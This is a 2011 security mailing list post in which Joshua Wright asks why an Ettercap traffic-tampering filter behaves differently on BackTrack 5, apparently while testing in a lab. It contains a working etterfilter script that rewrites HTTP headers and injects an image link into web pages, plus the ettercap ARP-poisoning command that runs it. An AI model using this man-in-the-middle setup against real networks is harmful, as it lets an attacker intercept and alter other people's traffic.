PaulDotCom mailing list archives
Ettercap + Etterfilter weirdness on BT5
From: Joshua Wright <jwright () hasborg com>
Date: Wed, 15 Jun 2011 08:13:59 -0400
Has anyone successfully used Ettercap with a filter on BT5? On BT4R2, this script works like a champ: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "If-Modified-Since")) { replace("Accept-Encoding", "If-PACified-Since"); msg("Killed If-Modified-Since\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\" "); msg("pwned image injected\n"); } # etterfilter -o pwned.ef pwned.filter # ettercap -TqM arp:remote -F pwned.ef // // In testing with BT5 however, I see the logging messages, and the packets are injected by Ettercap, but the original frames are not dropped. I validated this on the victim where he gets the original packets immediately followed by the Ettercap-modified packets. The follow-up packets are dropped by the victim as TCP retransmissions. I confirmed this behavior on BT5 VM and booting from a DVD natively. I'm guessing this is due to something having changed in the kernel from BT4R2 to BT5, but I'm not sure what it could be. I checked /sys/net/ipv4/ip_forward, but it is set to 0. Any other suggestions? Thanks, -Josh _______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Ettercap + Etterfilter weirdness on BT5 Joshua Wright (Jun 15)
- Re: Ettercap + Etterfilter weirdness on BT5 Ryan Dewhurst (Jun 15)